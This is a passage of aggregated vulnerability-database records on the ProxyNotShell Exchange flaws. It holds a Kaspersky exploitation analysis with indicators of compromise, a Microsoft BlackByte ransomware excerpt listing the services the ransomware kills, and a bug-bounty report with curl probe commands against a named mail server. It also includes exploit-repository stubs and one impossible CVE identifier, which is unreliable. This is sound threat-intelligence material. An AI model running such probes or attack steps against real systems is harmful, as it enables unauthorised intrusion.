Symantec System Recovery \nUI0Detect| MSExchangeSA| MSExchangeIS| ReportServer| MsDtsServer110 \nPOP3Svc| MSExchangeMGMT| SMTPSvc| MsDtsServer| IisAdmin \nMSExchangeES| EraserSvc11710| Enterprise Client Service| MsDtsServer100| NetMsmqActivator \nstc_raw_agent| VSNAPVSS| PDVFSService| AcrSch2Svc| Acronis \nCASAD2DWebSvc| CAARCUpdateSvc| McAfee| avpsus| DLPAgentService \nmfewc| BMR Boot Service| DefWatch| ccEvtMgr| ccSetMgr \nSavRoam| RTVsc screenconnect| ransom| sqltelemetry| msexch \nvnc| teamviewer| msolap| veeam| backup \nsql| memtas| vss| sophos| svc$ \nmepocs| wuauserv| | | \n \nDrivers that Blackbyte can bypass:\n\n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence 
Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>. \n\nThe post [The five-day job: A BlackByte ransomware intrusion case study](<https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T17:00:00", "type": "mmpc", "title": "The five-day job: A BlackByte ransomware intrusion case study", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16098", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2049-16098"], "modified": "2023-07-06T17:00:00", "id": "MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "href": "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2022-12-19T16:54:06", 
"description": "\n\n## Summary\n\nAt the end of September, GTSC reported an attack on critical infrastructure that took place in August. During the investigation, experts found that two 0-day vulnerabilities in Microsoft Exchange Server were used in the attack. The first one, later identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability that allows an authenticated attacker to remotely trigger the next vulnerability \u2013 CVE-2022-41082. The second vulnerability, in turn, allows remote code execution (RCE) when MS Exchange PowerShell is accessible to the attacker. As noted in the GTSC report, both vulnerabilities were exploited together in the wild to create a backdoor on a vulnerable server, and perform lateral movement.\n\nAfter CVE-2022-41040 and CVE-2022-41082 were revealed, Microsoft provided [mitigation guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) followed by a few updates. According to the company, the vulnerabilities affect MS Exchange Server 2013, MS Exchange Server 2016 and MS Exchange Server 2019.\n\nOn October 11, 2022, Microsoft released patches to cover these vulnerabilities as part of its Patch Tuesday update. After that, on November 17, a security researcher published the first working PoC. It was a Python script that accepts the following parameters: user, password, mail address and command line to be executed on the victim's host.\n\nThe cybersecurity community dubbed the pair of vulnerabilities **ProxyNotShell**. The name refers to a recent ProxyShell attack chain containing similar vulnerabilities in Exchange Servers that were disclosed in 2021. ProxyShell is a set of three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. 
Attackers used them to create web shells and execute arbitrary code on vulnerable Microsoft Exchange Servers.\n\n## ProxyNotShell exploitation details\n\nThe first step in this attack is exploiting **CVE-2022-41040** to get access to the PowerShell API endpoint. Exploiting insufficient filtering of input data in the Exchange **Autodiscover** mechanism, an attacker with a known login and password combination for a registered account can gain access to the privileged endpoint of the Exchange Server API (**https://%_exchange server domain%_/powershell**). This access allows the attacker to execute PowerShell commands in Exchange's environment on the server machine, passing them in the payload via the XML SOAP protocol.\n\nIn the next step, the attacker must get access to **Web-Based Enterprise Management (WBEM)** via the **WSMAN Protocol**. The attacker initiates the shell on the vulnerable system for further PowerShell script execution via **Windows Remote Management (PsRemoting)**.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083206/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_01.png>)\n\n**_HTTP POST request with XML SOAP to initiate PsRemoting_**\n\nOnce the shell is initiated, the attacker should immediately extend its lifetime; otherwise, the shell will be closed, as its expiration time is too short by default. This is necessary for further command execution on Exchange Server. To do that, the attacker immediately sends a special request via **WSMAN** that enables the **keep alive** option.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083245/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_02.png>)\n\n**_HTTP POST request with XML SOAP to extend the shell's lifetime_**\n\nAfter that, the attacker exploits a second vulnerability \u2013 **CVE-2022-41082**. 
By using PowerShell Remoting, the attacker sends a request to create an address book, passing encoded and serialized data with a special payload as a parameter. In a published PoC, this encoded data contains a gadget called **System.UnitySerializationHolder** that spawns an object of the **System.Windows.Markup.XamlReader** class. This class processes XAML data from a payload, which creates a new object of the **System.Diagnostics** class and contains a method call to open a new process on the target system. In the published PoC, this process is **calc.exe**.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083322/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_03.png>)\n\n**_HTTP POST request with XML SOAP to start a new process_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083400/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_04.png>)\n\n**_Main payload portion that executes the calc.exe process_**\n\n## ProxyNotShell post exploitation\n\nA few weeks after the vulnerability was disclosed, Kaspersky detected a successful exploitation of **ProxyNotShell** in the wild. The actor performed the following actions:\n\n * Reconnaissance (users, groups, domains)\n * Various hijack attempts (even dropping vulnerable binaries)\n * Remote process injection\n * Persistence\n * Reverse shell\n\nIn this case, the attacker had the credentials to perform such an intrusion. 
They exploited the company's Exchange Server and as a result were able to create any process they wanted on the Exchange machine, passing commands as a payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19095522/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_05.png>)\n\nOn the server side all processes that are started via exploitation have a main parent process with certain parameters: **w3wp.exe -ap "msexchangepowershellapppool".**\n\nThese post-exploitation steps of the attack are very similar to the steps in the attack reported by [TrendMicro](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.trendmicro.com%2Fpl_pl%2Fresearch%2F22%2Fg%2Flog4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.html&data=05%7C01%7Cmapp%40microsoft.com%7C6ea0cb7fcd7d4d2ea92808dab12e25ff%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C638017110445189023%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000%7C%7C%7C&sdata=O5D%2B8%2BG%2F%2BthCuhizLONIBuphB6uNAL%2Fp%2BrWWkWfQGa0%3D&reserved=0>), with the only difference being the vulnerabilities that are exploited.\n\nOur products protect against all of these post exploitation steps as well as other attacks leveraging the **CVE-2022-41040** and **CVE-2022-41082** vulnerabilities. The detection name for **ProxyNotShell** is **PDM:Exploit.Win32.Generic**.\n\n## Our recommendations\n\nA few words of advice to those worried about possible exploitation of ProxyNotShell or other 0-day vulnerabilities:\n\n * Focus your defense strategy on detecting lateral movement and data exfiltration to the internet. 
Pay special attention to outgoing traffic to detect cybercriminal connections.\n * Use the latest [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) data to stay aware of current TTPs used by threat actors.\n * Use a security solution with exploit prevention, vulnerability and patch management components, such as Kaspersky Endpoint Security for Business. Our [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component monitors suspicious actions by applications and blocks the execution of malicious files.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) that identify and stop attacks in the early stages.\n\n## Indicators of compromise\n\nF77E55FD56FDAD21766CAA9C896734E9 | LockDown.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n---|---|---|--- \nF9322EAD69300501356B13D751165DAA | mfeann.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \nA2FAE32F116870E5A94B5FAB50A1CB71 | Svchosts.exe | Malware reverse proxy | Trojan.Win64.Agent.qwibok, HEUR:HackTool.Win64.Proxy.gen \n47A0814408210E6FCA502B3799B3952B | Glib-2.0.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n379F87DAA6A23400ADF19C1CDD6B0DC9 | vmwarexferlogs.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \n193.149.185.52:443 | C2 server \nsync.service.auzreservices.com | C2 server", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-19T16:15:49", "type": "securelist", "title": "CVE-2022-41040 and CVE-2022-41082 \u2013 zero-days in MS Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-19T16:15:49", "id": "SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "href": "https://securelist.com/cve-2022-41040-and-cve-2022-41082-zero-days-in-ms-exchange/108364/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-08-25T13:21:05", "bounty": 1000.0, "description": "Hello Acronis team,\n\nPlease run\n\ncurl -ksL -m5 -o /dev/null -I -w \"%{http_code}\" \"https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync\"\ncurl -ksL -m5 \"https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync\" | grep Protocol\n\n\nand get following output\n\n404 and {\"Protocol\":\"ActiveSync\",\"Url\":\"https://eas.outlook.com/Microsoft-Server-ActiveSync\"}\n\nProving that mail.acronis.com is vulnerable to CVE-2022-41040\n\nPoc video attached\n\n## Impact\n\nSSRF can be used to for unauthorized actions or access to confidential data.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-02T08:47:22", "type": "hackerone", "title": "Acronis: mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-13T17:12:43", "id": "H1:1719719", "href": "https://hackerone.com/reports/1719719", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2023-02-03T11:16:36", "description": "# CVE-2022-41040-metasploit-ProxyNotShell\nthe metasploit script(...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T22:14:04", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": 
"2023-02-03T09:19:06", "id": "1FD14DF4-7723-5B40-A7BA-4E86B6E51603", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-09T05:17:47", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T07:47:45", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-09T01:03:02", "id": "480AA36A-BFDC-54DD-AE13-43A3FE97ADCE", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-04T19:39:20", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T17:36:06", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-04T17:42:39", "id": "FE6D7F99-F6AF-559F-93A5-786367B77158", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:24:24", "description": "# 
CVE-2022-41040-metasploit-ProxyNotShell\nthe metasploit script(...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T03:11:03", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2023-09-16T21:57:28", "id": "0A2301E7-88D2-55E7-BB5D-7889B2D2ACFD", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-04T08:02:33", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T03:50:10", "type": "githubexploit", "title": "Exploit for Improper Privilege 
Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-04T06:50:13", "id": "3410A018-A761-5411-8E58-892F756D299A", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-06T23:02:22", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T22:16:30", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-06T22:37:49", "id": "CF3485E1-2E99-580B-BC50-D61EA587BA40", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T23:03:14", "description": "# -CVE-2022-41082-RCE\nPoC for CVE-2022-41082 RCE as known as Pro...", "cvss3": {}, "published": "2022-09-30T20:59:46", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T21:01:47", "id": "B6C642BC-915E-52EA-80B0-BC40EDC884CC", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-11-02T16:19:33", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T11:53:14", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-21T14:50:07", "id": "5D652B55-850E-5043-96F0-43DE64B98D34", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-03T08:01:45", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T04:54:38", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-03T05:11:55", "id": "346026AA-22B5-5F79-9544-28E8E7CFE3F2", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-03T08:02:00", "description": "# CVE-2022-41082\nCVE-2022-41082 is a SSRF vulnerability which le...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T05:57:11", "type": "githubexploit", "title": 
"Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-03T05:57:48", "id": "6776EABD-28C1-5A42-8AB2-27BD7F492078", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-08-11T23:43:27", "description": "# vuln-CVE-2022-41082\nhttps & http\n\n\nFOR HTTP:\n\n`nm...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-22T20:04:07", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2023-03-22T20:11:03", "id": "03C7B86D-A112-52AC-86B9-25FC053C273B", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-09T08:13:25", "description": "# CVE-2022-41082-POC\nPoC for the CVE-2022-41082 NotProxyShell OW...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-22T09:35:26", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2023-01-09T07:01:20", "id": "4D11A641-A378-5AE3-8CCD-C45CFD453293", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-06T23:02:02", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T22:18:44", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-06T22:37:45", "id": "553EF29F-6CB4-5F8F-91AD-85FC945A94E0", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-03T08:01:47", "description": "# CVE-2022-41082\nCVE-2022-41082 is a SSRF vulnerability which le...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-02T08:51:58", 
"type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-02T12:29:02", "id": "9945D2DB-9314-5400-8C2B-94D4BD603DD9", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-12T17:00:15", "description": "# CVE-2022-41082-RCE-POC\nPoC and writeup for CVE-2022-41082. is ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T13:52:49", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-12T11:33:53", "id": "5C16D945-0879-5E51-B2AF-B106F633656A", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-01T15:53:13", "description": "# CVE-2022-41082-RCE\nCVE-2022-41082 is a SSRF vulnerability whic...", "cvss3": {}, "published": "2022-10-01T11:45:34", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-01T11:48:37", "id": "87179042-CF32-5495-87D0-B916B42259D2", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-06T11:05:04", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 